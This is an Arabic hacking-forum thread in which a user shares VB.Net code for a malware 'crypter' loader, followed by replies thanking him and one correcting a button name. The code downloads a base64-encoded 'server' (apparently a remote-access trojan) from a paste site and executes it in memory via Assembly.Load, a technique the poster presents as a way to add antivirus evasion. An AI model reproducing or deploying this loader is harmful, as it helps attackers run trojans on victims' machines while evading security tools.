Encryptoin Server VB.Net (40/1)

الموضوع في 'حماية الأجهزة' بواسطة MR.LAX, بتاريخ ‏25 يوليو 2017.

كاتب الموضوع : MR.LAX المشاهدات : 705 الردود : 25 ‏25 يوليو 2017
  1. غير متصل

    MR.LAX مہٰہٰسہٰہٰتہٰہٰر لاكہٰہٰسٰ‏
    Developer

    عضو منذ:
    ‏7 يوليو 2017
    عدد المشاركات:
    الإعجابات المتلقاة:
    21
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    السلام عليكم شلونكم يا طيبين اليوم

    جايبلكم تلغيمه نزول في ذاكره جهاز
    ماعليك تحول قيم سيرفر مالتك الى خوارزميه وترفعه على موقع
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]

    واذا تريد ضيف تخطيات تصبح اكثر وضيف كود في الفروم كما مبين في صوره

    [​IMG]
    الان ناتي الى كود تلغيمه
    كود:
    Imports System.Net[/I]
    [I]Imports System.Reflection
    
    Public Class Form1
        Private Sub HFxTheme1_Click(sender As Object, e As EventArgs) Handles HFxTheme1.Click
    
            Dim x As New WebClient()
            Dim xy As String = x.DownloadString("https://pastebin.com") 'هنا رابط قيم سيرفر
            'فك هاش الملف
            Dim exe As Byte() = Convert.FromBase64String(xy)
            'تشغيل السرفر ف الذاكرة
            Dim fuck As Assembly = Assembly.Load(exe)
            fuck.EntryPoint.Invoke(Nothing, New Object(-1) {})
            Console.ReadKey()
        End Sub
    End Class
    

     


    Abu Ahmed AlMadridi ،Mohmaed ،The Kaibdaki و 2آخرون معجبون بهذا.
    جاري تحميل الصفحة...
  2. غير متصل

    C r a c k e r
    Developer

    عضو منذ:
    ‏25 يوليو 2017
    عدد المشاركات:
    الإعجابات المتلقاة:
    54
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    عشت يا بطل
     


    أعجب بهذه المشاركة MR.LAX
  3. غير متصل

    ƊЄƔƖԼ ƇƠƊЄƦ Developer Plus
    DeveloPer Plus

    عضو منذ:
    ‏18 ابريل 2017
    عدد المشاركات:
    الإعجابات المتلقاة:
    510
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    حرامي محترف
    الإقامة:

    يعطيك العافية على تشفيرة
     


    أعجب بهذه المشاركة MR.LAX
  4. غير متصل

    محمد شوبكي
    ExpErt DeveloPer

    عضو منذ:
    ‏19 يوليو 2017
    عدد المشاركات:
    الإعجابات المتلقاة:
    111
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    1

    بارك الله فيك
    واصل بدون فواصل
     


    أعجب بهذه المشاركة MR.LAX
  5. غير متصل

    KaSp3r
    rankrank
    New Developer

    عضو منذ:
    ‏25 يوليو 2017
    عدد المشاركات:
    الإعجابات المتلقاة:
    49
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    HacKer
    الإقامة:

    واصل حب بس في خطا بالاكواد
    قيم كلمة HFxTheme1 و استبدلها بـ button1 لانه كذا راح يحصل اخطا عند وضع الكود داخل زر البوتون
    وهنا أكيد في ناس مبتداين ما راح يفهمو الكود
    شكرا
     


    MR.LAX و !- حيدر العراقي -! معجبون بهذا.
  6. غير متصل

    !- حيدر العراقي -! موقوف لمخالفة الشروط
    rankrank
    موقوف لمخالفة الشروط

    عضو منذ:
    ‏24 يوليو 2017
    عدد المشاركات:
    الإعجابات المتلقاة:
    31
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    مشكور يا غالي واصل إبداعاتك
     


    أعجب بهذه المشاركة MR.LAX
  7. غير متصل

    MR.LAX مہٰہٰسہٰہٰتہٰہٰر لاكہٰہٰسٰ‏
    Developer

    عضو منذ:
    ‏7 يوليو 2017
    عدد المشاركات:
    الإعجابات المتلقاة:
    21
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    اخي كنت مركب ثيم على فروم هوه لازم وضع قيم بفروم
     


  8. غير متصل

    MR.LAX مہٰہٰسہٰہٰتہٰہٰر لاكہٰہٰسٰ‏
    Developer

    عضو منذ:
    ‏7 يوليو 2017
    عدد المشاركات:
    الإعجابات المتلقاة:
    21
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    حبيبي نورت موضوع
     


  9. غير متصل

    MR.LAX مہٰہٰسہٰہٰتہٰہٰر لاكہٰہٰسٰ‏
    Developer

    عضو منذ:
    ‏7 يوليو 2017
    عدد المشاركات:
    الإعجابات المتلقاة:
    21
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    حبيبي نورت يعطيك عافيه
     


    أعجب بهذه المشاركة ƊЄƔƖԼ ƇƠƊЄƦ
  10. غير متصل

    MR.LAX مہٰہٰسہٰہٰتہٰہٰر لاكہٰہٰسٰ‏
    Developer

    عضو منذ:
    ‏7 يوليو 2017
    عدد المشاركات:
    الإعجابات المتلقاة:
    21
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    نورت موضوعي تدلل
     


الوسوم:

مشاركة هذه الصفحة

جاري تحميل الصفحة...